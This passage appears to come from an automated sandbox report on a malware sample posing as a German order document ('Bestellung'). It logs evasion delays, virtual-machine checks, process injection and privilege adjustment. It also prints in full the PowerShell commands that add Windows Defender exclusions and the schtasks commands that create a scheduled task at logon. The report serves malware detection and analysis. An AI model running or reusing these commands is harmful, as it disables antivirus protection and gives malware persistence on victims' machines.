                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeMemory allocated: 6E70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeMemory allocated: 9120000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeMemory allocated: A120000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeMemory allocated: 61E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 3170000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 3380000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 3170000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 5980000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 6980000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 6AB0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 7AB0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 9D60000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: AD60000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 6E20000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 3100000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 33B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 3100000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 58F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 68F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 6A20000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 7A20000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 9D50000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: AD50000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 6D90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 18D0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 33B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 31F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeMemory allocated: 2B50000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeMemory allocated: 2DD0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeMemory allocated: 4DD0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 16D0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 3070000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory allocated: 5070000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3953Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4525Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3256
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3659
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeWindow / User API: threadDelayed 8994
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeWindow / User API: threadDelayed 788
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5362
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 500
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5736
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 589
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe TID: 3228Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1992Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2772Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1660Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe TID: 2512Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe TID: 3796Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe TID: 504Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe TID: 3340Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4620Thread sleep count: 3256 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5484Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3528Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6728Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4520Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe TID: 1872Thread sleep time: -25825441703193356s >= -30000s
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe TID: 1160Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3500Thread sleep count: 5362 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1904Thread sleep count: 500 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3508Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4300Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3116Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 636Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe TID: 2300Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe TID: 3352Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeThread delayed: delay time: 922337203685477
                Source: outlooks.exe, 0000000D.00000002.1534984172.000000000153F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: outlooks.exe, 00000016.00000002.3894160572.0000000005B68000.00000004.00000020.00020000.00000000.sdmp, outlooks.exe, 00000016.00000002.3907694103.0000000007761000.00000004.00000020.00020000.00000000.sdmp, outlooks.exe, 00000016.00000002.3894160572.0000000005C38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeMemory written: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory written: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory written: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /fJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp314.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess created: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpD780.tmp"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp537.tmp"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /f
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
